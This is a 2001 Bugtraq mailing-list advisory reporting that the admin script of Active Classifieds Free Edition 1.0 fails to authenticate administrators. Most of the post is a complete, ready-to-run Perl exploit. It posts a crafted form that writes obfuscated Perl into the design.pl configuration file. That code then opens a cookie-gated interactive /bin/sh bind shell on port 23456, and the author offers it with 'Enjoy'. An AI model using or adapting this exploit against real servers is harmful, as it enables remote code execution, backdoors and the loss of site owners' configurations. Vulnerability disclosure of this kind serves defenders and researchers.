Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Active Web Classifieds failure to authenticate leads to arbitrary code execution

From: "Deja User" <noident () my-deja com>
Date: Wed, 27 Jun 2001 18:30:17 -0700
Active Classifieds Free Edition from Active Web Suite Technologies http://www.activewebsuite.com
fails to authenticate administrators, which allows unauthorized modification of
configuration files, which in turn, allows remote arbitrary code execution.
Tested on:
Program: Active Classifieds Free Edition
Versions: 1.0
Commercial versions may also be vulnerable

Bug discovered and sploit written by Igor Dobrovitski noident () my-deja com


The problem is in some subroutines in library files that are added to 'admin.cgi'
through the 'require' statement. Some subroutines will happily accept input from anyone
without calling the authentication subroutine and make changes to the configuration files,
which are require'd by the script too.
Thus, anyone can change settings, including administrator's password. Of course,
it is also possile to inject our own Perl code via user-supplied variables, which will be written
into the configuration files and executed upon the next invocation of the script.

sub edit_design_variables {

&admin_login_check;
.................
This  subroutine, for example, will authenticate the administrator and print out the form.

sub submit_edit_design_variables {

&exclusive_lockfile(LOCK);

open (DESIGN, ">$require_path/variables/design.pl");
........................
This subroutine, however, won't bother with authentication and will write user input to 'design.pl'

Solution:
There is no one-line solution to it. &admin_login_check should be called where appropriate.



Exploit:


#!/usr/bin/perl -w
# exploit by Igor Dobrovitski noident () my-deja com
# This exploit will spawn an interactive shell on port 23456
# A configuration file that is added to the admin.cgi at runtime through 'require' statement
# can be ovewritten. We can write to that file, but can't read it, so we simply restore
# the default settings. If the administrator made changes to the file
# 'websites/default/variables/design.pl', those changes will be lost and defaults restored.
# Our shell code is also written to that file, but will only be executed if the password
# cookie is supplied. Whoever else invokes the script won't trigger the shell.
# Enjoy
use Socket;
$| = 1;
####################################################################################################
$password = 'noident';   # Our cookie password, change it if you want, don't set to empty string
# Some metacharacters, like quotes and '&'  are filtered so  the code looks a bit weird
$exec_code = 'use Socket;$shell = (chr 47) . bin . (chr 47) . sh . (chr 32) . (chr 45) . (chr 105);socket(SOCK, 
PF_INET, SOCK_STREAM, 6);setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, 1);$port=23456;bind(SOCK, sockaddr_in($port, 
INADDR_ANY));listen(SOCK, 1);accept (NEW, SOCK);if(!fork()){open STDIN, (chr 60) . (chr 38) . NEW; open STDOUT, (chr 
62) . (chr 38) . NEW;open STDERR, (chr 62) . (chr 38) . NEW;exec $shell}else{close NEW;exit;}';
####################################################################################################
unless(defined $ARGV[0]) {die "Usage: $0 www.example.com/cgi-bin/blah/classifieds/admin.cgi\n"}
$ARGV[0] =~ s|^(?:http://)*||;
($host, $scriptpath) = $ARGV[0] =~ m|^(.*?)(/.*)$|;
my $form = makeform({
    'request' => 'submit_edit_design_variables',
    'bgcolor' => '#FFFFFF',
    'text' => '#000000',
    'link' => 'navy',
    'vlink' => '#aaaaaa',
    'alink' => '#FFCC00',
    'marginheight' => '0',
    'marginwidth' => '0',
    'topmargin' => '0',
    'leftmargin' => '0',
    'background' => '',

    'table_width' => "600';\nif(\$ENV{HTTP_COOKIE} eq \'$password\'){$exec_code}\n\$blah = '",
    'header_row_color' => '#666666',
    'mouse_over_color' => '#DDDDDD',
    'line_color' => '#C0C0C0',
    'alternate_row_color' => '#EEEEEE',

    'inverse_font_color' => '#FFFFFF',
    'alternate_font_color' => '#666666',
    'font_face' => 'arial, helvetica',
    'small_font_size' => '1',
    'standard_font_size' => '2',
    'large_font_size' => '3',

    'max_records_per_page' => '20',
    'allow_show_all' => 'yes',
    'display_ad_count' => 'yes',
    'display_icons' => 'yes',
    'display_ad_totals' => 'yes',
    'display_ad_postdate' => 'yes',
    'display_location' => 'yes',

    'date_format' => '3',

    'months' => 'January\nFebruary\nMarch\nApril\nMay\nJune\nJuly\nAugust\nSeptember\nOctober\nNovember\nDecember',
    'shortmonths' => 'Jan\nFeb\nMar\nApr\nMay\nJun\nJul\nAug\nSept\nOct\nNov\nDec',
    'weekdays' => 'Sunday\nMonday\nTuesday\nWednesday\nThursday\nFriday\nSaturday',
    'years' => '2000\n2001\n2002\n2003\n2004',
    'states' => 'Alabama\nAlaska\nArizona\nArkansas\nCalifornia\nColorado\nConnecticut\nDistrict of 
Columbia\nDelaware\nFlorida\nGeorgia\nGuam\nHawaii\nIdaho\nIllinois\nIndiana\nIowa\nKansas\nKentucky\nLouisiana\nMaine\nMaryland\nMassachusetts\nMichigan\nMinnesota\nMississippi\nMissouri\nMontana\nNebraska\nNevada\nNew
 Hampshire\nNew Jersey\nNew Mexico\nNew York\nNorth Carolina\nNorth 
Dakota\nOhio\nOklahoma\nOregon\nPennsylvania\nPuerto Rico\nRhode Island\nSouth Carolina\nSouth 
Dakota\nTennessee\nTexas\nUtah\nVermont\nVirginia\nWashington\nWest 
Virginia\nWisconsin\nWyoming\n-------------------------\nCanada - Alberta\nCanada - British Columbia\nCanada - 
Manitoba\nCanada - New Brunswick\nCanada - Newfoundland\nCanada - Northwest Territories\nCanada - Nova Scotia\nCanada - 
Ontario\nCanada - Prince Edward Island\nCanada - Quebec\nCanada - Saskatchewan\nCanada - 
Yukon\n-------------------------\nUK - Channel Islands\nUK - England - London\nUK - England - Mid\nUK - England - 
North\n!
UK - England - Southeast\nUK - England - Southwest\nUK - Isle of Man\nUK - Northern Ireland\nUK - Scotland\nUK - 
Wales\n-------------------------\nEurope - Eastern Europe\nEurope - France\nEurope - Germany\nEurope - Ireland\nEurope 
- Italy\nEurope - Netherlands\nEurope - Scandinavia\nEurope - Other\n-------------------------\nAsia and Pacific - 
Australia\nAsia and Pacific - India\nAsia and Pacific - Japan\nAsia and Pacific - New Zealand\nAsia and Pacific - 
Other\n-------------------------\nAfrica\nLatin America\nMiddle East\nOther Area'
});
print "Engaging the enemy. Please stand by...\n";
for(my $i=0;$i<2;$i++)
{
# first time we overwrite the require'd file
# second time we execute the script, the poisoned file is loaded, checks our cookie and 
# opens the backdoor for us. After that it exits without overwriting the file the 2nd time
    &send($form);
}
&oops_the_sploit_did_not_work();

sub makeform
{
    my $string;
    my @blah;
    my $line  = '';
    my $here;
    my %data = %{$_[0]};
    foreach my $key (keys %data)
    {
        $line .= "$key" . 'AAAA' . "$data{$key}" . 'BBBB';
    }
    $line =~ s|^(.*)BBBB$|$1|;
    $line =~ s/\\n/\n/g;
    $line =~ s/\\t/\t/g;
    $line =~ s/\\e/\e/g;
    $line =~ s/\\f/\f/g;
    $line =~ s/\\r/\r/g;
    $line =~ s/\\0/\0/g;
    foreach my $char (split //, $line)
    {
        if($char !~ m/[A-Za-z0-9._ ]/)
        {
            $char = unpack "H2", $char;
            $char = '%' . "$char";
        }
        push @blah, $char;
    }
    $string = join "",@blah;
    $string =~ s/AAAA/=/g;
    $string =~ s/BBBB/&/g;
    $string =~ s/ /+/g;
    my $cont_len = length($string);
$here = <<EOF;
POST $scriptpath HTTP/1.0
User-Agent: Mozilla (Windows 98)
Host: $host
cookie: $password
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Content-type: application/x-www-form-urlencoded
Content-length: $cont_len

$string
EOF
    return $here;
}

sub send
{
    my $form_to_send = shift;
    my $h = inet_aton($host) or die "Forward lookup for $host failed\n";
    socket(S,PF_INET,SOCK_STREAM,6) or die "socket prolems\n";
    unless(connect(S,sockaddr_in(80,$h))) {print STDERR "Couldn't connect to " . inet_ntoa($h) . "\n"
; close(S); exit 1 }
    select(S);
    $|=1;
    print "$form_to_send";
    local($SIG{ALRM}) = sub { print STDERR "Timeout was expected. The shell awaits you on port 23456\nHave fun and be 
excellent to the webmaster.\n"; exit };
    alarm(20);
    my @reply=<S>;
    select(STDOUT);
    close(S);
    return @reply;
}

sub oops_the_sploit_did_not_work
{
    print STDERR "The exploit didn't work on this host\nSorry...\n";
    exit;
}




------------------------------------------------------------
--== Sent via Deja.com ==--
http://www.deja.com/
Previous By Date Next
Previous By Thread Next

Current thread: